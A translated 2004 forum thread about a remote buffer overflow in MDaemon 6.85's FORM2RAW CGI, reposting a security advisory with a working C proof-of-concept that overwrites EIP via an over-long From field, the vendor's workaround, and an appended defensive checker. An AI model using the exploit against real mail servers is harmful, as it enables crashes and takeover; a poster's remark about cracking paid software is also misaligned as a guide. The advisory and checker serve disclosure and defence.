Title: Serious vulnerability in MD 6.8.5

Author: badwrs2000   Time: 2004-3-29 13:45   Title: Serious vulnerability in MD 6.8.5
MD 6.8.5 (including the preceding versions) has a serious vulnerability that can bring the SMTP service down; carefully crafted malicious code can open a shell.

Author: goxia   Time: 2004-3-29 13:48   Title: Re: Serious vulnerability in MD 6.8.5
Give us some details.

Author: hiandy   Time: 2004-3-31 16:33   Title: Re: Serious vulnerability in MD 6.8.5
Please post the relevant material.

Author: samson-du   Time: 2004-3-31 23:36   Title: Re: Serious vulnerability in MD 6.8.5
Moderator! How are we supposed to patch this? Please explain the fix in detail!

Author: chyangwa   Time: 2004-3-31 23:38   Title: Re: Serious vulnerability in MD 6.8.5
What exactly is the vulnerability, and how do we fix it? You have been keeping us in suspense a bit too long.

Author: goxia   Time: 2004-4-1 09:41   Title: Re: Serious vulnerability in MD 6.8.5
Honestly! That's not very brotherly of you.

Author: badwrs2000   Time: 2004-4-1 17:29   Title: Re: Serious vulnerability in MD 6.8.5
My IMail board doesn't get much traffic, so I came over to the MD board for a visit.

If it were an IMail problem, I would certainly "do the brotherly thing".

As for this MD vulnerability, it really is very serious; if you can upgrade to 7.0, that is best.

Author: hiandy   Time: 2004-4-1 19:37   Title: Re: Serious vulnerability in MD 6.8.5
Title 1/1/2004
Remote Buffer Overflow in MDaemon (Raw Message Handler)

Summary
"MDaemon offers a full range of mail server functionality. MDaemon protects your users from spam and viruses, provides full security, includes seamless web access to your email via WorldClient, remote administration, and much more!"
FORM2RAW.exe is a CGI that allows users to send emails through MDaemon via a web page. It processes the fields of an HTML form and creates a raw message file in the raw queue directory of the MDaemon mail server. This file is then processed and queued for delivery by MDaemon. An attacker can cause a buffer overflow in MDaemon by issuing a malformed CGI request to FORM2RAW.exe.

Details
Vulnerable Systems:
* MDaemon 6.85 and prior to 6.52

According to the Help file: "By default, MDaemon 6.52 or higher will not send emails created by Form2Raw unless the email address passed in the 'from' tag (see below) is a valid account on the MDaemon server. If you want to disable this behavior you can set FromCheck=No in the FORM2RAW.INI file."

Sending more than 153 bytes in the "From" field to FORM2RAW.exe creates a raw file that, when processed by MDaemon, causes a stack buffer overflow. The EIP register is overwritten when the From field is 249 bytes long.

FORM2RAW.exe is accessible on any default installation of the WorldClient web server (usually listening on port 3000).

Exploit:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* strcpy(), strcat(), strlen(), memset() */
#include <winsock.h>
#pragma comment (lib,"ws2_32")
#define RET 0x1dff160   /* not used by this PoC; EIP is simply overwritten with "bbbb" below */
#define PORT 3000       /* WorldClient default port */

int main(int argc, char **argv)
{
    SOCKET s = 0;
    WSADATA wsaData;

    if(argc < 2)
    {
        fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, " \
                "\nUsage: %s <target ip> \n", argv[0]);
        printf("%d",argc);
        exit(0);
    }

    WSAStartup(MAKEWORD(2,0), &wsaData);

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if(INVALID_SOCKET != s)
    {
        SOCKADDR_IN anAddr;
        anAddr.sin_family = AF_INET;
        anAddr.sin_port = htons(PORT);
        anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

        if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
        {
            static char buffer[500];
            int i;
            memset(buffer,0,sizeof(buffer));
            /* From value = 244 filler bytes + 4 bytes that land in EIP + 1 trailing byte (249 total) */
            strcpy(buffer,"get /form2raw.cgi?From=");
            for(i=0;i<244;i++) {
                strcat(buffer,"a");
            }
            strcat(buffer,"bbbb"); //Overwrites EIP
            strcat(buffer,"c"); //One byte left after ESP :-(
            strcat(buffer,"&To=me@hell.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");

            send(s, buffer, strlen(buffer), 0);
            printf("Exploit Sent.");
        }
        else printf("Error Connecting to The Target.\n");
        closesocket(s);
    }

    WSACleanup();
    return 0;
}

Vendor Response (Patch):

Robin Edwards wrote: We have had a similar vulnerability report with Form2Raw and hope to release a patch soon. In the meantime it is easy to disable Form2Raw by following the instructions below:

To disable FORM2RAW open the
\MDaemon\WorldClient\WorldClient.ini file with Notepad and
delete the following two lines:

CgiBase2=/Form2Raw.cgi
CgiFile2=C:\MDaemon\CGI\Form2Raw.exe

Afterward, restart WorldClient to register the change.

Author: hiandy   Time: 2004-4-1 19:38   Title: Re: Serious vulnerability in MD 6.8.5
http://www.securiteam.com/windowsntfocus/5ZP050ABPY.html

Author: 伏小鹏   Time: 2004-4-4 15:51   Title: Re: Serious vulnerability in MD 6.8.5
To disable FORM2RAW open the
\MDaemon\WorldClient\WorldClient.ini file with Notepad and
delete the following two lines:

CgiBase2=/Form2Raw.cgi
CgiFile2=C:\MDaemon\CGI\Form2Raw.exe

Afterward, restart WorldClient to register the change.

So is that the fix? Delete these two files?
Then restart and it's done?

Couldn't get 7.0.1 cracked....... so I have no choice but to use 6.8.5.

Author: redneck   Time: 2004-4-4 16:43   Title: Re: Serious vulnerability in MD 6.8.5
The attack code I have seen targets MD 6.85 on the WinXP platform; I haven't seen attack code for 2000 or 2003.
I think most admins can relax for now; without ready-made tools, most script kiddies won't attack your server :0

Author: 钉子   Time: 2004-4-6 00:56   Title: Re: Serious vulnerability in MD 6.8.5
Watching this...

Author: zhouyihua   Time: 2004-5-13 12:53   Title: Re: Serious vulnerability in MD 6.8.5
So how do we fix it?

Author: 冷雨   Time: 2004-5-13 14:59   Title: Re: Serious vulnerability in MD 6.8.5
Bump.........

Author: 顶着锅盖的士兵   Time: 2004-5-13 20:19   Title: Re: Serious vulnerability in MD 6.8.5
Watching this closely..............
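An added example for the advisory hiandy posted above; it is not MDaemon code, not the advisory's exploit, and not from anyone in this thread. It models the bounds check the advisory says the raw message handler lacks, and scans queued raw messages for a From value longer than the 153 bytes the advisory gives as the overflow threshold (249 bytes reaching EIP). The "Name: value" header layout, the sample messages, and the function names are assumptions made for this example; MDaemon's real .raw file layout differs in detail, so adapt find_header() before pointing this at a real raw queue.

```c
/* Added example: model of the missing From-length check in the MDaemon 6.85 raw
 * handler, and a scanner for over-long From values in queued raw messages.
 * Not MDaemon's code. Header layout "Name: value" is an assumption. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FROM_SAFE_MAX 153   /* longest From value the advisory reports as safe */
#define FROM_EIP_LEN  249   /* From length at which the advisory says EIP is overwritten */

enum from_verdict { FROM_OK = 0, FROM_MISSING = 1, FROM_OVERLONG = 2 };

/* Case-insensitive prefix compare; the caller guarantees s has at least n bytes. */
static int prefix_ci(const char *s, const char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)s[i]) != tolower((unsigned char)p[i]))
            return 0;
    return 1;
}

/* Find the first header line starting with `name` (e.g. "from:") before the blank
 * line that ends the header block. Returns a pointer to the value with leading
 * blanks skipped and stores its length in *len; returns NULL if absent. */
static const char *find_header(const char *raw, const char *name, size_t *len)
{
    size_t nlen = strlen(name);
    const char *line = raw;
    for (;;) {
        const char *eol = strpbrk(line, "\r\n");
        size_t llen = eol ? (size_t)(eol - line) : strlen(line);
        if (llen == 0)
            break;                          /* blank line: end of headers */
        if (llen >= nlen && prefix_ci(line, name, nlen)) {
            const char *v = line + nlen;
            while (v < line + llen && (*v == ' ' || *v == '\t'))
                v++;
            *len = (size_t)(line + llen - v);
            return v;
        }
        if (!eol)
            break;
        line = eol;
        if (*line == '\r') line++;
        if (*line == '\n') line++;
    }
    return NULL;
}

/* Classify a raw message by its From length. FROM_OVERLONG is the case that, per the
 * advisory, crashes the 6.85 raw handler (and at 249 bytes controls EIP). */
static enum from_verdict check_raw_from(const char *raw, size_t *from_len)
{
    size_t len = 0;
    const char *v = find_header(raw, "from:", &len);
    if (from_len)
        *from_len = len;
    if (!v)
        return FROM_MISSING;
    return len > FROM_SAFE_MAX ? FROM_OVERLONG : FROM_OK;
}

/* Hardened copy into a fixed buffer. The unsafe pattern is strcpy(buf, from) into a
 * stack array, which an over-long From overruns. This version refuses instead of
 * truncating, because a silently shortened sender address would change whose mail
 * the message appears to be. Returns 0 on success, -1 if the value does not fit. */
static int copy_from_bounded(const char *raw, char *out, size_t outsz)
{
    size_t len = 0;
    const char *v = find_header(raw, "from:", &len);
    if (!v || len >= outsz)
        return -1;
    memcpy(out, v, len);
    out[len] = '\0';
    return 0;
}

/* Build a constructed raw message (same To/Subject values as the posted exploit)
 * whose From value is n bytes of 'a', and return its verdict. */
static enum from_verdict verdict_for_from_len(size_t n)
{
    char from[513];
    char raw[640];
    if (n > sizeof from - 1)
        n = sizeof from - 1;
    memset(from, 'a', n);
    from[n] = '\0';
    snprintf(raw, sizeof raw,
             "From: %s\r\nTo: me@hell.org\r\nSubject: hi\r\n\r\nhello\r\n", from);
    return check_raw_from(raw, NULL);
}

int main(void)
{
    /* Constructed samples, not real queue files. */
    const char *samples[] = {
        "From: alice@example.com\r\nTo: bob@example.com\r\nSubject: hi\r\n\r\nhello\r\n",
        "To: bob@example.com\r\nSubject: no sender\r\n\r\nFrom: not-a-header\r\n",
    };
    for (size_t i = 0; i < 2; i++) {
        size_t len = 0;
        enum from_verdict v = check_raw_from(samples[i], &len);
        printf("sample %zu: verdict=%d from_len=%zu\n", i, (int)v, len);
    }
    printf("%d-byte From: verdict=%d\n", FROM_EIP_LEN, (int)verdict_for_from_len(FROM_EIP_LEN));
    return 0;
}
```

A From of exactly 153 bytes is reported as FROM_OK and 154 as FROM_OVERLONG, matching the advisory's threshold; the "From:" that appears after the blank line in the second sample is body text and is deliberately not treated as a header.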